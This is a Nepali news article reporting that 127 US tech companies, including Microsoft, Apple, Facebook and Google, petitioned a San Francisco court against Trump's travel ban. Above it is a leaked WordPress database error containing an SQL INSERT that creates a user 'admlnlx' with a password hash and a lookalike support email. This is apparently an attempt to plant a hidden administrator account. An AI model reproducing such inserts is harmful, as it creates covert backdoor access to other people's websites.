WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B5HBZeX4vVq8P894HD5SBLGNH9JH9P1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 00:42:09', '', 'admlnlx', 'admlnlx')
काठमान्डौं, माघ २६-
अमेरिकाका माइक्रोसफ्ट, एप्पल, फेसबुक, र गुगलसहित १२७ प्रविधि सम्बन्धी कम्पनीहरुले अमेरिकी राष्ट्रपति डोनाल्ड ट्रम्पले हालै घोषणा गरेको यात्रा प्रतिबन्धको निर्णयको विरोधमा उभिएका छन् ।
उनीहरुले ट्रम्पको निर्णयले आफ्नो व्यापारमा नोक्सान पुगेको भन्दै एक याचिकामा हस्ताक्षर गरेको बीबीसीले जनाएको छ ।सो कानुनी डकुमेन्टमा सुरुमा ९७ फर्महरुले हस्ताक्षर गरि बुझाएका थिए । पछि थप ३० फर्महरु पनि समावेस भएको बताइएको छ । सो याचिकामा ट्रम्पले सात मुस्लिम देशका नागरिकलाई तथा विश्वभरीबाट शरणार्थीलाई अमेरिका प्रवेशमा प्रतिबन्ध लगाउने काम गैरसंवैधानिक भएको पनि दाबी गरिएको बताइएको छ ।सो याचिका सान फ्रान्सिस्कोको एक अदालतमा दायर गरेको बताइएको छ ।
सो याचिकामा सात मुस्लिम बहुल देश नागरिकमाथिको प्रतिवन्धले आफ्ना कम्पनीमा काम गर्ने प्रतिभा खोज्न समस्या पर्ने बताइएको छ । ट्रम्पको सो आदेश अमेरिकाको सियाटलका एक न्यायाधिसको आदेशपछि निलम्बित अवस्थामा छ ।